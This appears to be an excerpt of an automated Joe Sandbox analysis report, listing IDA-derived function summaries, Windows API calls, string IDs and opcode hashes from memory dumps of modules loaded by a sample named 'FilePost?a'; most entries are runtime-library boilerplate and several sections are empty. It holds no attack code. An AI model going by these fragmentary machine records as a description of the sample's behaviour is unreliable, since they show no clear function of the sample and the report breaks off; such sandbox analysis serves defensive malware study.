                                          • API String ID: 2319145605-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 6D185733
                                            • Part of subcall function 6D17ACB9: HeapFree.KERNEL32(00000000,00000000,?,6D1799DC), ref: 6D17ACCF
                                            • Part of subcall function 6D17ACB9: GetLastError.KERNEL32(?,?,6D1799DC), ref: 6D17ACE1
                                          • _free.LIBCMT ref: 6D185745
                                          • _free.LIBCMT ref: 6D185757
                                          • _free.LIBCMT ref: 6D185769
                                          • _free.LIBCMT ref: 6D18577B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EnterCriticalSection.KERNEL32(6D1CB368,00000000,?,6D152074,6D1C9F48,6D18E680,00000001), ref: 6D167DE2
                                          • LeaveCriticalSection.KERNEL32(6D1CB368,?,6D152074,6D1C9F48,6D18E680,00000001), ref: 6D167E15
                                          • RtlWakeAllConditionVariable.NTDLL ref: 6D167E8C
                                          • SetEvent.KERNEL32(?,6D1C9F48,6D18E680,00000001), ref: 6D167E96
                                          • ResetEvent.KERNEL32(?,6D1C9F48,6D18E680,00000001), ref: 6D167EA2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                          • String ID:
                                          • API String ID: 3916383385-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E3940D5
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6E39418E
                                          • __DestructExceptionObject.VCRUNTIME140 ref: 6E3941AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CurrentDestructExceptionImageNonwritableObject___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1849493825-1018135373
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Replicator::operator[].LIBCMT ref: 6E39D721
                                          • DName::DName.LIBVCRUNTIME ref: 6E39D86C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::Replicator::operator[]
                                          • String ID: ...$Y9n
                                          • API String ID: 3707554701-2185204884
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,6E3969BE,?,?,00000000,00000000,00000000,?), ref: 6E396A59
                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,?,?,?,?,6E3969BE,?,?,00000000,00000000,00000000,?,?), ref: 6E396B64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: EncodePointerabort
                                          • String ID: MOC$RCC
                                          • API String ID: 1188231555-2084237596
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _FindAndUnlinkFrame.VCRUNTIME140(?), ref: 6E397494
                                          • _IsExceptionObjectToBeDestroyed.VCRUNTIME140(?), ref: 6E3974FE
                                          • __DestructExceptionObject.VCRUNTIME140(?,00000001), ref: 6E397512
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExceptionObject$DestroyedDestructFindFrameUnlink
                                          • String ID: csm
                                          • API String ID: 1567117672-1018135373
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6E39878D: pDNameNode::pDNameNode.LIBCMT ref: 6E3987B3
                                          • DName::DName.LIBVCRUNTIME ref: 6E39AF82
                                          • DName::operator+.LIBCMT ref: 6E39AF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name$Name::Name::operator+NodeNode::p
                                          • String ID: void$void
                                          • API String ID: 3257498322-3746155364
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: __aulldiv__aullrem
                                          • String ID: Y9n$|+uyo
                                          • API String ID: 3839614884-1341198111
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlUnwind.KERNEL32(?,6E393162,80000026,00000000,?,?), ref: 6E39315D
                                          • _local_unwind2.VCRUNTIME140(?,?,?), ref: 6E3931A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Unwind_local_unwind2
                                          • String ID: &$02CV
                                          • API String ID: 2435528123-3673091860
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: __aulldiv__aullrem
                                          • String ID: Y9n$|+uyo
                                          • API String ID: 3839614884-1341198111
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RaiseException.KERNEL32(E06D7363,00000001,00000003,R{9n,?,?,?,?,6E397B52,?,6E39FC88), ref: 6E397E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID: Bad dynamic_cast!$R{9n$R{9n
                                          • API String ID: 3997070919-839941646
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _FindAndUnlinkFrame.VCRUNTIME140(?,6E396F08), ref: 6E396F2C
                                          • _IsExceptionObjectToBeDestroyed.VCRUNTIME140(?,6E396F08), ref: 6E396F7E
                                          • __DestructExceptionObject.VCRUNTIME140(00000001,?,6E396F08), ref: 6E396F94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExceptionObject$DestroyedDestructFindFrameUnlink
                                          • String ID: csm
                                          • API String ID: 1567117672-1018135373
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6E3962E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: terminate
                                          • String ID: MOC$RCC$csm
                                          • API String ID: 1821763600-2671469338
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D172D9D,00000000,?,00000001,?,?,?,6D172E8C,00000001,FlsFree,6D195C60,6D195C68), ref: 6D172DF9
                                          • GetLastError.KERNEL32(?,6D172D9D,00000000,?,00000001,?,?,?,6D172E8C,00000001,FlsFree,6D195C60,6D195C68,00000000,?,6D16B5AC), ref: 6D172E03
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D172E2B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID: api-ms-
                                          • API String ID: 3177248105-2084034818
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6D16EE8E
                                          • UnDecorator::getSymbolName.LIBCMT ref: 6D16EF20
                                          • DName::operator+.LIBCMT ref: 6D16F024
                                          • DName::DName.LIBVCRUNTIME ref: 6D16F0C7
                                            • Part of subcall function 6D16CA50: shared_ptr.LIBCMT ref: 6D16CA6C
                                            • Part of subcall function 6D16CC4C: DName::DName.LIBVCRUNTIME ref: 6D16CCAA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
                                          • String ID:
                                          • API String ID: 1134295639-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: EqualOffsetTypeids
                                          • String ID:
                                          • API String ID: 1707706676-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          Similarity
                                          • API ID: EqualOffsetTypeids
                                          • String ID:
                                          • API String ID: 1707706676-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 6D18B30A
                                          • _free.LIBCMT ref: 6D18B333
                                          • SetEndOfFile.KERNEL32(00000000,6D189A49,00000000,6D189CE0,?,?,?,?,?,?,?,6D189A49,6D189CE0,00000000), ref: 6D18B365
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6D189A49,6D189CE0,00000000,?,?,?,?,00000000), ref: 6D18B381
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: _free$ErrorFileLast
                                          • String ID:
                                          • API String ID: 1547350101-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D178AA4: _free.LIBCMT ref: 6D178AB2
                                            • Part of subcall function 6D17FFCF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6D1739A1,6D17DB72,0000FDE9,00000000,?,?,?,6D17D8EB,0000FDE9,00000000,?), ref: 6D18007B
                                          • GetLastError.KERNEL32 ref: 6D1838A4
                                          • __dosmaperr.LIBCMT ref: 6D1838AB
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D1838EA
                                          • __dosmaperr.LIBCMT ref: 6D1838F1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                          • String ID:
                                          • API String ID: 167067550-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E392D3E
                                          • _global_unwind2.VCRUNTIME140(?), ref: 6E392DA5
                                          • _local_unwind2.VCRUNTIME140(?,?), ref: 6E392DB2
                                          • _local_unwind2.VCRUNTIME140(?,000000FF), ref: 6E392DF0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          Similarity
                                          • API ID: _local_unwind2$___except_validate_context_record_global_unwind2
                                          • String ID:
                                          • API String ID: 2485504424-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                          • _free.LIBCMT ref: 6D17B0BF
                                          • _free.LIBCMT ref: 6D17B0F5
                                          • SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,00000001,6D173299,6D17ACDF,?,?,6D1799DC), ref: 6D17B1B9
                                          • _free.LIBCMT ref: 6D17B216
                                          • _free.LIBCMT ref: 6D17B24C
                                          • SetLastError.KERNEL32(00000000,00000007,000000FF,?,00000001,6D173299,6D17ACDF,?,?,6D1799DC), ref: 6D17B257
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6D144D81
                                          • TranslateMessage.USER32(?), ref: 6D144D99
                                          • DispatchMessageW.USER32(?), ref: 6D144D9F
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6D144DAB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: Message$DispatchTranslate
                                          • String ID:
                                          • API String ID: 1706434739-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6D18734F,?,00000001,?,00000001,?,6D17D5C1,?,?,00000001), ref: 6D18AD0D
                                          • GetLastError.KERNEL32(?,6D18734F,?,00000001,?,00000001,?,6D17D5C1,?,?,00000001,?,00000001,?,6D17DB0D,6D1739A1), ref: 6D18AD19
                                            • Part of subcall function 6D18ACDF: CloseHandle.KERNEL32(FFFFFFFE,6D18AD29,?,6D18734F,?,00000001,?,00000001,?,6D17D5C1,?,?,00000001,?,00000001), ref: 6D18ACEF
                                          • ___initconout.LIBCMT ref: 6D18AD29
                                            • Part of subcall function 6D18ACA1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D18ACD0,6D18733C,00000001,?,6D17D5C1,?,?,00000001,?), ref: 6D18ACB4
                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6D18734F,?,00000001,?,00000001,?,6D17D5C1,?,?,00000001,?), ref: 6D18AD3E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SleepConditionVariableCS.KERNELBASE(?,6D167E47,00000064), ref: 6D167ECD
                                          • LeaveCriticalSection.KERNEL32(6D1CB368,6D1C9F48,?,6D167E47,00000064,?,6D15203E,6D1C9F48,00000001), ref: 6D167ED7
                                          • WaitForSingleObjectEx.KERNEL32(6D1C9F48,00000000,?,6D167E47,00000064,?,6D15203E,6D1C9F48,00000001), ref: 6D167EE8
                                          • EnterCriticalSection.KERNEL32(6D1CB368,?,6D167E47,00000064,?,6D15203E,6D1C9F48,00000001), ref: 6D167EEF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Similarity
                                          • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                          • String ID:
                                          • API String ID: 3269011525-0
                                          • Opcode ID: 4878f5d989f921193798bf51e944625f9aa1cd553802ee8150f8227a573b5845
                                          • Instruction ID: 8be9b4375e8c571b429f036c0a42547686bcac7d8014205338abedb674f7edee
                                          • Opcode Fuzzy Hash: 4878f5d989f921193798bf51e944625f9aa1cd553802ee8150f8227a573b5845
                                          • Instruction Fuzzy Hash: 12E01232941668FBCF025B94ED08B9D3F39BB1B753B115052F915E6524C7EA5810CBD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 6E396FA3
                                          • unexpected.VCRUNTIME140(00000004,6E396A33,00000000,?,?,?,?,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000), ref: 6E396FB7
                                            • Part of subcall function 6E397EF0: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6E397F07
                                          • _CxxThrowException.VCRUNTIME140(00000000,00000000,00000004,6E396A33,00000000,?,?,?,?,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000), ref: 6E396FCB
                                            • Part of subcall function 6E397E10: RaiseException.KERNEL32(E06D7363,00000001,00000003,R{9n,?,?,?,?,6E397B52,?,6E39FC88), ref: 6E397E70
                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000004,6E396A33,00000000,?,?,?,?,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000), ref: 6E396FD0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Exception$H_prolog3_catchRaiseThrowabortterminateunexpected
                                          • String ID:
                                          • API String ID: 2326190164-0
                                          • Opcode ID: c07729fe9b552d1fea28e7542f0853332e6a65f8debe9bfef84d6610262773f6
                                          • Instruction ID: 169d906e75697a069b87b9b7ad9057df696f548c168a05563ca5c55d7d193c6b
                                          • Opcode Fuzzy Hash: c07729fe9b552d1fea28e7542f0853332e6a65f8debe9bfef84d6610262773f6
                                          • Instruction Fuzzy Hash: D6E05B72914204AFF754EFF5C805B9D31295F80369F114C5CE2450F2D5EB719A41EF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 6D179B23
                                            • Part of subcall function 6D17ACB9: HeapFree.KERNEL32(00000000,00000000,?,6D1799DC), ref: 6D17ACCF
                                            • Part of subcall function 6D17ACB9: GetLastError.KERNEL32(?,?,6D1799DC), ref: 6D17ACE1
                                          • _free.LIBCMT ref: 6D179B36
                                          • _free.LIBCMT ref: 6D179B47
                                          • _free.LIBCMT ref: 6D179B58
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 4747bc582a5d8fcf37725527b9734a1d01141899ba4a1413c2ac34271ec46c5e
                                          • Instruction ID: 3328e3b1a2308f3f06e42e0670c1401431a3f8e96d76cb5fac870018bb1ddc55
                                          • Opcode Fuzzy Hash: 4747bc582a5d8fcf37725527b9734a1d01141899ba4a1413c2ac34271ec46c5e
                                          • Instruction Fuzzy Hash: C4E0BF75446124AFCE116F24B740A953F71AB4AE253460046FA04D3224CFFF4651EFCB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D14A580: ___std_exception_copy.LIBVCRUNTIME ref: 6D14A6A2
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6D144103
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6D144179
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_$___std_exception_copy
                                          • String ID: OutputStreamPointer
                                          • API String ID: 1754327082-2506108687
                                          • Opcode ID: da6e8f0db010c161d4c1b2f7af0230adf846d55b53f623c3f12fcea71c027cd1
                                          • Instruction ID: 8ebe1fbf0c2aa9cff45c6957bffd53ec072dd2031fd98383a875e9efd530374b
                                          • Opcode Fuzzy Hash: da6e8f0db010c161d4c1b2f7af0230adf846d55b53f623c3f12fcea71c027cd1
                                          • Instruction Fuzzy Hash: D7026DB4D04249DFDB10CF68C944BEDBBB1BF19308F1481A8D519AB385DBB1AA84CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
